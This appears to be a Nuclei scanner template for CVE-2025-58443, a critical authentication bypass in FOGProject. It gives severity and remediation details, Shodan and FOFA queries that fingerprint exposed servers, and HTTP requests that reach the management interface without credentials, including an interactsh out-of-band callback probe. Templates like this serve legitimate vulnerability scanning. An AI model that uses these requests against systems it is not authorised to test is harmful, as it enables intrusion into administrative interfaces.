id: CVE-2025-58443 info: name: FOGProject <= 1.5.10.1673 - Authentication Bypass author: oleveloper severity: critical description: | FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information. impact: | Unauthenticated attackers can bypass authentication to access the FOGProject management interface and retrieve sensitive system configuration and host management information. remediation: | Upgrade FOGProject to a version later than 1.5.10.1673 that implements proper authentication on all management endpoints. reference: - https://github.com/casp3r0x0/CVE-2025-58443 - https://nvd.nist.gov/vuln/detail/CVE-2025-58443 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2025-58443 epss-score: 0.09895 epss-percentile: 0.9314 cwe-id: CWE-287 metadata: max-request: 3 vendor: fogproject product: fogproject fofa-query: icon_hash="-1952619005" shodan-query: http.favicon.hash:-1952619005 tags: cve,cve2025,fogproject,auth-bypass,vkev flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" redirects: true matchers: - type: dsl dsl: - "contains(body, 'FOG')" - "status_code == 200" condition: and internal: true - method: GET path: - "{{BaseURL}}/fog/management/index.php?node=about&sub=kernel" - "{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}" matchers-condition: or matchers: - type: dsl dsl: - "status_code == 200" - "contains(interactsh_protocol,'dns')" condition: and - type: dsl dsl: - "status_code == 200" - "regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)" condition: and # digest: 4a0a0047304502201fa18d4837b40b0cb6f477af9df79d09feb405af376f84e8739ad2d24865a91a022100a18cafe143974c0fa46018b403316b2c0948696fa4c3a5cd2d96f17f23e69b58:922c64590222798bb761d5b6d8e72950